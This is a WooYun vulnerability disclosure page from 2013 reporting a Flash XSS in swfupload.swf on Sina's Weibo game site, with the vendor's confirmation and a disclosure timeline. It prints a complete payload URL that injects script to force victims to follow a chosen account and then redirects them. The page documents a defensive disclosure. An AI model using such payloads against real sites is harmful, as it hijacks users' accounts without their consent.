当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-038360

漏洞标题:经典flash漏洞导致的微博加粉

相关厂商:新浪

漏洞作者: yimi

提交时间:2013-09-27 17:22

修复时间:2013-11-11 17:23

公开时间:2013-11-11 17:23

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:6

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-27: 细节已通知厂商并且等待厂商处理中
2013-09-27: 厂商已经确认,细节仅向厂商公开
2013-10-07: 细节向核心白帽子及相关领域专家公开
2013-10-17: 细节向普通白帽子公开
2013-10-27: 细节向实习白帽子公开
2013-11-11: 细节向公众公开

简要描述:

flash漏洞导致的xss,可以加粉

详细说明:

无聊,跑到微博游戏那里转转,看网页代码发现是phpwind做的。找了下普通的xss,一无所获。
想起wind有flash的xss,找了下,还真有,可以利用下玩玩。

漏洞证明:

论坛里面也有加粉的按钮,不过需要获取一个csrf_token才能调用加粉地址,也能拿到,但相对麻烦,翻了许多页面,在手机游戏发现有个不需要token的地址。
ajax代码是在网上搜的,只在chrome、firefox试了下可以,利用代码:

http://game.weibo.com/club/res/js/dev/util_libs/swfupload/Flash/swfupload.swf?movieName=%22])}catch(e){oAjax=new XMLHttpRequest();oAjax.open("POST","http://game.weibo.com/mobile/message/makeFollow",true);oAjax.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');oAjax.send("uid=2721930343");setTimeout(function(){window.location.href="http://game.weibo.com/club/read-671795-1"},2000);}//

修复方案:

修复flash漏洞

版权声明:转载请注明来源 yimi@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-09-27 17:37

厂商回复:

感谢关注新浪安全,已安排人员进行修复~
另,祝小伙伴们十一欢乐~

最新状态:

暂无


漏洞评价:

评论

  1. 2013-09-27 22:18 | Ki11 ( 路人 | Rank:26 漏洞数:5 | ส็็็็็็็็็็็็็็็็็็็...)

    小伙伴开门,你的水表掉了

  2. 2013-11-11 17:41 | Sogili ( 普通白帽子 | Rank:129 漏洞数:27 )

    这标题好水啊

  3. 2014-04-23 20:11 | 小贱人 ( 路人 | Rank:4 漏洞数:3 | 资深菜鸟,)

    mark